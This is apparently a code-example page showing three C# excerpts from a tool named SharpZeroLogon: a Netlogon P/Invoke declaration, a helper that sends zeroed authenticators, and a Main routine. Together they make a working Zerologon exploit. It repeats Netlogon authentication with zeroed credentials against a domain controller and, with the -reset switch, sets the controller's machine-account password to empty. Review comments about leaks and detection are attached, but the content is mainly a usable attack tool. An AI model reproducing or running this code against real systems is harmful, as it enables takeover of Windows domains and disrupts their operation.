예제 #1
파일: Netapi32.cs 프로젝트: zha0/nccfsas
 /// <summary>
 /// P/Invoke declaration of the Netlogon RPC call <c>I_NetServerPasswordSet2</c>. The binding attribute
 /// (DLL name, charset) precedes this line and is outside this excerpt. On this page the call is made
 /// from <c>Main</c> only after <c>I_NetServerAuthenticate2</c> returned <c>0</c>.
 /// </summary>
 /// <param name="PrimaryName">Server the call is issued against; the caller in <c>Main</c> passes the target FQDN.</param>
 /// <param name="AccountName">Account whose password is being set; the caller passes <c>hostname + "$"</c>, i.e. a machine account.</param>
 /// <param name="AccountType">Secure channel type; the caller uses <c>NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel</c>.</param>
 /// <param name="ComputerName">Name of the calling computer as presented to the server.</param>
 /// <param name="Authenticator">Client authenticator, passed by <c>ref</c> so the callee may update it.</param>
 /// <param name="ReturnAuthenticator">Authenticator returned by the server; the caller in <c>Main</c> discards it with <c>out _</c>.</param>
 /// <param name="ClearNewPassword">New password structure, passed by <c>ref</c>; the caller passes a default-constructed <c>NL_TRUST_PASSWORD</c>.</param>
 /// <returns>Status code; callers on this page treat <c>0</c> as success.</returns>
 public static extern int I_NetServerPasswordSet2(
     string PrimaryName,
     string AccountName,
     NETLOGON_SECURE_CHANNEL_TYPE AccountType,
     string ComputerName,
     ref NETLOGON_AUTHENTICATOR Authenticator,
     out NETLOGON_AUTHENTICATOR ReturnAuthenticator,
     ref NL_TRUST_PASSWORD ClearNewPassword
     );
예제 #2
        /// <summary>
        /// Issues a NetServerPasswordSet2 call through the project's own RPC stub, using an
        /// all-zero credential in both authenticators and a default-constructed
        /// <c>NL_TRUST_PASSWORD</c> (the same zeroed-authenticator pattern <c>Main</c> on this
        /// page labels "Zerologon").
        /// </summary>
        /// <param name="targetcomputeraccount">Account name handed to the stub as the AccountName argument.</param>
        /// <returns>The status returned by the stub call, as <c>Natives.NTSTATUS</c>.</returns>
        /// <remarks>
        /// NOTE(review): every unmanaged buffer allocated here (pcred, ccred, computernamePtr,
        /// targetcomputeraccountPtr, ptpass) is leaked — there is no matching
        /// <c>Marshal.FreeHGlobal</c> and no try/finally around the call. The helpers
        /// <c>GetStubPtr()</c> and <c>GetProcStringPtr(142)</c> are defined elsewhere in the
        /// project; their semantics are not visible here. From a defender's perspective the
        /// observable event is a machine-account password change for a domain controller
        /// issued over a Netlogon channel authenticated with zeroed credentials; secure-channel
        /// enforcement on the DC is the control that rejects that path.
        /// </remarks>
        private static Natives.NTSTATUS ChangeDCPassword(string targetcomputeraccount)
        {
            // Eight zero bytes are used for both the "plaintext" and the "ciphertext" credential.
            byte[] plaintext  = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
            byte[] ciphertext = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };

            // Wrap the zero buffers in NETLOGON_CREDENTIAL structs (local names keep the
            // original misspellings "palintextcred"/"chiphertextcred").
            NETLOGON_CREDENTIAL palintextcred = new NETLOGON_CREDENTIAL
            {
                data = plaintext
            };

            NETLOGON_CREDENTIAL chiphertextcred = new NETLOGON_CREDENTIAL
            {
                data = ciphertext
            };

            // Authenticators carrying the zero credentials and a zero timestamp.
            NETLOGON_AUTHENTICATOR plainAuth = new NETLOGON_AUTHENTICATOR
            {
                Credential = palintextcred,
                Timestamp  = 0
            };

            NETLOGON_AUTHENTICATOR cipherAuth = new NETLOGON_AUTHENTICATOR
            {
                Credential = chiphertextcred,
                Timestamp  = 0
            };

            // Copy both authenticators into unmanaged memory for the stub call.
            // NOTE(review): fDeleteOld=false is right for freshly allocated memory, but these
            // allocations are never freed (see <remarks>).
            IntPtr pcred = Marshal.AllocHGlobal(Marshal.SizeOf(plainAuth));

            Marshal.StructureToPtr(plainAuth, pcred, false);

            IntPtr ccred = Marshal.AllocHGlobal(Marshal.SizeOf(cipherAuth));

            Marshal.StructureToPtr(cipherAuth, ccred, false);

            // "Neverland" is a hard-coded placeholder used as the ComputerName argument.
            IntPtr computernamePtr = Marshal.StringToHGlobalUni("Neverland");

            IntPtr targetcomputeraccountPtr = Marshal.StringToHGlobalUni(targetcomputeraccount);

            // Default-constructed trust password; the layout of NL_TRUST_PASSWORD is not visible
            // here, so its contents are whatever the struct's default is — verify against the definition.
            NL_TRUST_PASSWORD tpass = new NL_TRUST_PASSWORD();

            IntPtr ptpass = Marshal.AllocHGlobal(Marshal.SizeOf(tpass));

            Marshal.StructureToPtr(tpass, ptpass, false);

            // Call through the project stub. 142 is presumably an index into a procedure-string
            // table maintained elsewhere in the project — not visible here, confirm before relying on it.
            NTSTATUS rpcStatus = (NTSTATUS)NetServerPasswordSet2(GetStubPtr(), GetProcStringPtr(142), IntPtr.Zero, targetcomputeraccountPtr, NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, computernamePtr, pcred, ccred, ptpass);

            // The cast is redundant: rpcStatus is already an NTSTATUS.
            return((NTSTATUS)rpcStatus);
        }
예제 #3
파일: Program.cs 프로젝트: zha0/nccfsas
        /// <summary>
        /// Entry point. Reads the target FQDN and the optional <c>-reset</c> / <c>-patch</c>
        /// switches, then repeatedly runs the Netlogon challenge/authenticate exchange with
        /// default-constructed (zeroed) challenges to test whether the target accepts them —
        /// the check the messages call "Zerologon". With <c>-reset</c>, a successful
        /// authentication is followed by <c>I_NetServerPasswordSet2</c> against the target's
        /// machine account.
        /// </summary>
        /// <param name="args">args[0] is the target DC FQDN; all arguments (including args[0]) are scanned for <c>-reset</c> and <c>-patch</c>.</param>
        /// <remarks>
        /// NOTE(review): because the switch loop also inspects args[0], a target literally named
        /// "-reset" would set the flag. <c>PatchLogon()</c>, <c>I_NetServerReqChallenge</c> and
        /// <c>I_NetServerAuthenticate2</c> are declared elsewhere in the project. From a
        /// defender's perspective, the behaviour here is exactly what Netlogon secure-channel
        /// enforcement on domain controllers is meant to reject; a DC machine-account password
        /// reset following a burst of NetServerReqChallenge/NetServerAuthenticate calls is the
        /// pattern to alert on.
        /// </remarks>
        static void Main(string[] args)
        {
            // The target FQDN is mandatory; everything else is optional.
            if (args.Length < 1)
            {
                Console.WriteLine(" Usage: SharpZeroLogon.exe <target dc fqdn> <optional: -reset -patch>");
                return;
            }

            // hostname is the first DNS label of the FQDN (a dotless input yields itself).
            bool   reset    = false;
            bool   patch    = false;
            string fqdn     = args[0];
            string hostname = fqdn.Split('.')[0];

            // Scan every argument for the two known switches; unknown ones are ignored.
            foreach (string arg in args)
            {
                switch (arg)
                {
                case "-reset":
                    reset = true;
                    break;

                case "-patch":
                    patch = true;
                    break;
                }
            }

            // PatchLogon() is defined elsewhere; the success message suggests it switches the
            // RPC transport to ncacn_ip_tcp, but its implementation is not visible here.
            if (patch)
            {
                if (!PatchLogon())
                {
                    Console.WriteLine("Patching failed :(");
                    return;
                }
                Console.WriteLine("Patch successful. Will use ncacn_ip_tcp");
            }

            // Both challenges are default-constructed (zeroed) and never assigned by this code;
            // they are passed by ref, so the native calls may overwrite them.
            NETLOGON_CREDENTIAL ClientChallenge = new NETLOGON_CREDENTIAL();
            NETLOGON_CREDENTIAL ServerChallenge = new NETLOGON_CREDENTIAL();
            // Passed by ref to I_NetServerAuthenticate2; the meaning of the individual bits is not visible here.
            ulong NegotiateFlags = 0x212fffff;

            Console.WriteLine("Performing authentication attempts...");

            // Up to 2000 attempts. The loop ends early on a failed challenge (fatal) or on the
            // first authenticate call that returns 0.
            for (int i = 0; i < 2000; i++)
            {
                // A non-zero status from the challenge is treated as a name/network problem.
                if (I_NetServerReqChallenge(fqdn, hostname, ref ClientChallenge, ref ServerChallenge) != 0)
                {
                    Console.WriteLine("Unable to complete server challenge. Possible invalid name or network issues?");
                    return;
                }
                // Progress marker, one per attempt.
                Console.Write("=");

                // A 0 return here means the target accepted the zeroed client credential.
                if (I_NetServerAuthenticate2(fqdn, hostname + "$", NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
                                             hostname, ref ClientChallenge, ref ServerChallenge, ref NegotiateFlags) == 0)
                {
                    Console.WriteLine("\nSuccess! DC can be fully compromised by a Zerologon attack.");

                    // Both structures are default-constructed (zeroed) before the password-set call.
                    NETLOGON_AUTHENTICATOR authenticator    = new NETLOGON_AUTHENTICATOR();
                    NL_TRUST_PASSWORD      ClearNewPassword = new NL_TRUST_PASSWORD();

                    if (reset)
                    {
                        // The server's ReturnAuthenticator is discarded.
                        if (I_NetServerPasswordSet2(
                                fqdn,
                                hostname + "$",
                                NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
                                hostname,
                                ref authenticator,
                                out _,
                                ref ClearNewPassword
                                ) == 0)
                        {
                            // The NTLM value in this message is a constant string in the source; nothing here computes it.
                            Console.WriteLine("Done! Machine account password set to NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0");
                            return;
                        }
                        Console.WriteLine("Failed to reset machine account password");
                    }

                    // Without -reset (or after a failed reset) the program stops after reporting.
                    return;
                }
            }
            // Reached only when all 2000 attempts failed to authenticate.
            Console.WriteLine("\nAttack failed. Target is probably patched.");
        }